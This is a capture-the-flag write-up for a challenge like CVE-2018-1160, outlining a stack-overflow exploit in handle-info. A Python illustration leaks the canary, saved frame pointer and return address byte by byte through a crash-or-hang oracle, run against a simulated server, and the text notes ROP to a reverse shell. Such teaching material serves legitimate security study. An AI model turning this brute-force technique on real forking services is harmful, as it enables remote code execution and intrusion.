The solution is similar to CVE-2018-1160 (Metatalk from HITCON 2021).
1. Read the source code and find the vulnerability.
2. I found two vulnerabilities: a heap overflow and a stack overflow in the function handle-info.
3. The heap overflow is hard to use, because it needs a carefully constructed heap feng shui.
4. The stack overflow is easy to use: since each connection either crashes or hangs depending on what we overwrite, we can leak the PIE, heap and canary values by observing the state of the connection (crash or hang).
5. ROP to get a reverse shell.
Exp:
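The author's exploit is not reproduced on this page. As an added illustration of step 4 only (this is not the author's code and not the challenge binary), the following script shows the crash-or-hang oracle used to leak the values above the overflowed buffer one byte at a time. It assumes a forking service (every child inherits the same canary and addresses, so a wrong guess kills only that child) and a length-controlled write that does not append a terminator, so the overwrite can stop after any byte. The target is replaced by a simulated server with constructed canary, saved frame pointer and return-address values; the buffer size, the order of fields above it, and the fact that the stack-canary low byte is zero on x86-64 glibc are assumptions, as is the choice of which pointers (PIE, heap) are reachable from that frame in the real challenge.

```python
import struct

BUF_LEN = 64                 # size of the overflowed stack buffer (assumed)
CRASH, HANG = "crash", "hang"


class ForkServerSim:
    """Constructed stand-in for a forking service with a stack overflow in its
    request handler. Bytes written past the buffer land on the canary, the saved
    frame pointer and the return address, in that order (assumed layout)."""

    def __init__(self, canary: int, saved_rbp: int, ret_addr: int):
        self.secret = struct.pack("<QQQ", canary, saved_rbp, ret_addr)
        self.queries = 0

    def send(self, payload: bytes) -> str:
        """Return HANG if the handler survives the overwrite, CRASH otherwise."""
        self.queries += 1
        overflow = payload[BUF_LEN:]
        # Partial overwrite: only the bytes actually written are compared. A wrong
        # canary trips __stack_chk_fail, a wrong saved rbp or return address faults
        # on return; either way the child dies and the connection drops. If every
        # written byte equals the original, the handler keeps running and the
        # connection hangs waiting for more input.
        if len(overflow) <= len(self.secret) and overflow == self.secret[:len(overflow)]:
            return HANG
        return CRASH


def leak_bytes(oracle, known: bytes, count: int) -> bytes:
    """Recover `count` more bytes after `known` using a crash/hang oracle.

    Each round sends buffer filler + all bytes known so far + one guessed byte.
    Only the correct guess leaves the frame intact, so only it produces a hang."""
    out = bytearray(known)
    for _ in range(count):
        for guess in range(256):
            payload = b"A" * BUF_LEN + bytes(out) + bytes([guess])
            if oracle(payload) == HANG:
                out.append(guess)
                break
        else:
            raise RuntimeError("no byte produced a hang; layout assumption is wrong")
    return bytes(out)


def leak_frame(oracle):
    """Leak (canary, saved_rbp, return_address) as integers."""
    canary = leak_bytes(oracle, b"\x00", 7)          # low canary byte is 0x00 on x86-64 glibc
    rbp = leak_bytes(oracle, canary, 8)[8:]
    ret = leak_bytes(oracle, canary + rbp, 8)[16:]
    return tuple(struct.unpack("<Q", x)[0] for x in (canary, rbp, ret))


if __name__ == "__main__":
    # Constructed sample values; a real run would talk to the service over a socket.
    target = ForkServerSim(canary=0x1122334455667700,
                           saved_rbp=0x7FFDDEADBEEF,
                           ret_addr=0x555512345678)
    canary, rbp, ret = leak_frame(target.send)
    print(f"canary={canary:#018x} rbp={rbp:#x} ret={ret:#x} queries={target.queries}")
```

Against a real target, `oracle` is a function that sends the payload over a fresh connection and reports whether the socket was closed (crash) or stayed open past a timeout (hang); the leaked return address then gives the PIE base once its offset inside the binary is known, and the ROP chain of step 5 is built on top of the recovered canary and that base. The worst case is 256 queries per byte, so 23 unknown bytes cost under 6000 connections.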